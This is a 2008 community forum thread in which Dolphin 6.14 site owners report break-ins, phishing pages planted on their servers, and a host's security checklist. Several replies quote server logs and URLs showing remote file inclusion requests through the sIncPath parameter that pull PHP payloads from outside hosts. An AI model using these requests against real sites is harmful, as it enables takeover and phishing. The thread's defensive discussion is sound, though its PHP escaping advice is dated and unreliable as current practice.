Dolphin 6.14 site hacked

tango3d posted 4th of November 2008 in Community Voice. 14 comments.

I set up a test site with the free version of Dolphin 6.14 and it has been hacked. seems that the hackes are using SQL Injection there was a new user set up in the database with the name PJKing, and some new files in the Dolphin root directory. 2 of which were done.php and dones.php. I only realised this had happened when my hosting company suspended my account. because phishing emails had been sent from it.

 

Also globals were set to off. and all file permissions were set correctly. so I have no idea how this has happened.

 

Here is a list of 10 things to do to make your site more secure, this was sent to my by my hosting company but not being a coder I don't understand all of them.

 

The programs that operate database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site.
>
> 1. Set register_globals to OFF
> 2. Turn off Display Error/Warning Messages. set error_display to ZERO
> 3. Never run unescaped queries
> 4. Validate all user inputs. Items on Forms, in URLS and so on
> 5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
> 6. Access Control, U don't want ya user to have access to Admin function or Clean up scripts
> 7. htaccess is your friend use it to deny people (we also have a easy deny manager too in the cpanel)
> 8. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files you can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php)
> 9. To protect against SQL injection attacks Sometimes hackers will try to screw up you database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database!
>
> To protect against this, you need to use this PHP function:
> mysql_real_escape_string()
> This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
> Example:
> $name = $_REQUEST['name'];
> $safe_name = mysql_real_escape_string($name);
> Now you know the variable $safe_name, is safe to use with your SQL code.
>
> 10. Keep the PHP code to yourself. If anyone can see it they can expliot vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server's document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.
>
> You can find more information about hardening your PHP scripts at: http://phpsec.org/projects/guide/
>
> Thank you,
>
> HostMonster.Com

 
Comments
·Oldest
·Top
Please login to post a comment.
iced
Did they tell you exactly how the site was hacked? How do they send phising emails from dolphin?

cheers

iced
sammie
bluehost and hostmonster are the same company both have register_globals on by default. and you are hosted with them, you site shared the server with 1997 other sites on that same server
tango3d
Sammie, Please explain, I don't understand what you are saying, because in my php.ini register globals are and were set to off by default. and are you saying that my site should not be on a shared server?
buckmcgoo
Bluehost and Hostmonster have register globals off by default
gameutopia
There are a number of possibilities like file permissions as you mention. There are plenty to be set and then reversed during post-install sometimes one of them is missed or overlooked by accident.

You mentioned register globals last time I installed dolphin for someone at hostmonster register globals was indeed off by default.

There are some hacks out there that attempt to set globals.

It's a remote possibility that another account holder on the same server has a hack that they gained access see more to other files on the same server.

There are tons of rfi's that hit sites all the time.

Some people also give out hosting access, ftp access, and dolphin admin panel access, whether it be for a mod install or a fix or whatever. Then, they forget to change the passwords after the work is completed.

There is also the possibility that someone found another exploit in dolphin. Script makers often make claims about how safe and secure their script is, but sometimes you need to help it out. Keep it up-to-date and patched, read up on security and how to help protect it and block things. There are a number of things you can do with .htaccess. Check your logs and stats for suspicious activity.

Does someone hate you or your site. You would be surprised what some will do when they really don't like someone or some site. The more you put your domain name out there the more likely someone will try to compromise and exploit it.

I know some folks that have an account with hostmonster and they have never mentioned any problems with hacks.

Anyway good luck to you.
noilien
My site got hacked last night. it were really bad that my host have to restore it from the backup. here is the log. i am using the latest version 6.14 is there a patch for this?
Hello,

I have restored the account from our weekly backups. You were hacked because of the "Dolphin" application being exploited ( /ray/modules/global/inc/header.inc.php ). The logs of this exploit are below. You will need to update this to the latest version available, or remove the exploitable code.

189.73.227.43 see more //ray/modules/global/inc/header.inc.php?sIncPath=http://dlsowns.helloweb.eu/mailer2.txt? 200
189.73.227.43 //ray/modules/global/inc/header.inc.php?sIncPath=http://dlsowns.helloweb.eu/mailer2.txt? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 200
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 302
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 302
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
77.46.169.164 //ray/modules/global/inc/header.inc.php?sIncPath=http://vidinas.net/includes/pbot.txt?? 200
77.46.169.164 //ray/modules/global/inc/header.inc.php?sIncPath=http://vidinas.net/includes/pbot.txt?? 200

Regards,
Jonathan C.
Network Security Administrator
tango3d
Sounds to me like you did not reverse the permissions for this file header.inc.php after Dolphin install
shaneed
I also got a kind of hack attempt but i don't know where it comes from. Someone is inserting some script in my index.php page of Dolphin at the end of the code, making my homepage to give php errors until i remove it. The rest is fine... If someone can provide me some solution would be more than great.
raeshantael
I got that too but I need to know how to prevent this. DOES ANYONE KNOW???
I get hacked twice. Strange though... only after I post for help. Any way I receive the same type if code "sIncPath=http://www..." They were able to create an index2.html which was a Wachovia looking home page and this ip address continues to look for it: 209.147.127.216 - Optic Fusion (from Washington State US) & 79.179.102.205 - RIPE Network Coordination Centre (Amsterdam). I have reported this info with the logs. They also placed "confirm.html" and "/asp/SignOn.aspx/" see more which went to an M&T bank looking homepage on my server. It looks like they are also using the shoutbox files in Ray. This is NO GOOD. If this is a way to get users to buy licenses, I just as well not have free versions and just charge for secure code. I've waisted a month on this.
pokystud
I feel for ya I got hacked the same way on my site so I pulled to plug on it and removed it from my server but I am still getting those two IPS trying to access html/cache/manager and langs. defientely no good.
stech786
I don't understand this part

> To protect against this, you need to use this PHP function:
> mysql_real_escape_string()
> This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
> Example:
> $name = $_REQUEST['name'];
> $safe_name = mysql_real_escape_string($name);
> Now you know the variable $safe_name, is safe to use with your SQL code.
marmed
Someone tried to do this on my site too

/ray/modules/global/inc/header.inc.php?sIncPath=http://kadin.or.id/mail/id1.txt%3f%3f

Is there any patch available?
marmed
i solved it by adding a .htaccess file in the /ray/modules/global/inc/ folder with the content "deny from all"

it seems to work but they seem to be trying with
/orca/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f

and

/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.051833868026733